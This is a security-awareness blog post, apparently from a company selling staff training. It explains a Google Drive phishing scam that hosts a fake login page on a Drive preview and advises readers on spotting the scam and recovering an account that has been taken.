Phishing scams are nothing new in the security industry. Typically, they involve a poorly written email that points you to an awful clone site of Paypal or eBay. For most of these scams, you can’t help but to notice the warning signs. However, the new Google Drive phishing scam is much more deceptive.
Using Google Drive to Phish
Here’s how this new phishing scam works. You’ll first receive an email with a subject line such as “Documents.” In the body of the email, you’ll be asked to open an important document linked from drive.google.com. When you click this link, Google Drive will ask you to log in. Not only will the login form look identical to the real one, but the domain will look correct as well.
For many phishing scams, the domain of the web page is often a giveaway. For instance, the page will claim to be the Paypal login, but the URL will not be from Paypal. However, the new Google Drive phishing scam removes this red flag. The address will say ‘Google.com.’ That’s because the official-looking login page is actually a preview page for a folder stored on Google Drive.
Thinking the page is safe, you’ll enter your login credentials. The information is sent to a PHP form processing page on the hacker’s domain. The processing page records your information and sends it to the hacker.
When it’s over, you’re shown an actual document to reduce the chance that you’ll realize what happened. However, at this point, your Google account is compromised, and scammers can now log in and use your email or any other Google services linked to your account.
Why Scammers Go for Google Accounts
Google accounts are the primary target for phishing scammers. Scammers use your Gmail account to spam their phishing link to your contacts. Since your contacts recognize your email, they will more likely fall victim to the scam. Scammers can also read any important documents or information stored in your email account.
Stealing Google accounts is more than just email, though. Scammers can gain access to Google Play music. They can access your Google Wallet. They can generate the HTML file needed to verify your website in Webmaster Tools, which exposes your website’s reporting data. They can affect your Adwords campaigns or view your Adsense data. They can even spam a phishing link using your G+ profile.
Some of these consequences seem minor, but users who integrate Google into their lives store a lot of sensitive information in these accounts. The level of consequences is dependent on the hacker’s creativity and the amount of information exposed.
What Can You Do?
In general, don’t open links from unfamiliar email addresses. Even if you know the sender, be suspicious of links to Google Drive that you were not expecting.
If you think you’ve been scammed, the first step is to change your Google account password. Then, log in to Gmail and scroll down to the bottom of the page. Click “Details” under the “Last Account Activity” text. Click “Sign out all other sessions” to lock out hackers who are currently logged in to your account.
Google also offers two-step verification. Two-step verification sends a pin number to your phone when you log in from a computer that isn’t your personal one. This security process stops hackers from ever signing in to your account, even if they have your password.
A hacker’s goal is to bypass security red flags and firewalls. This scam creatively hides any warning signs that would normally help people from avoiding it. If you think you’ve received one of these phishing emails, send it to the trash or report it to Google.
Contact Sensible about our Employee Security Awareness Training program. This self-paced program teaches your staff on how to identify email phishing and scams.
Google has issued a statement indicating “We’ve removed the fake pages and our abuse team is working to prevent this kind of spoofing from happening again. If you think you may have accidentally given out your account information, please reset your password.”
Based on Google’s statement the issue appears solved, however we have continued to find reports of the exploit indicating that it may still be ongoing.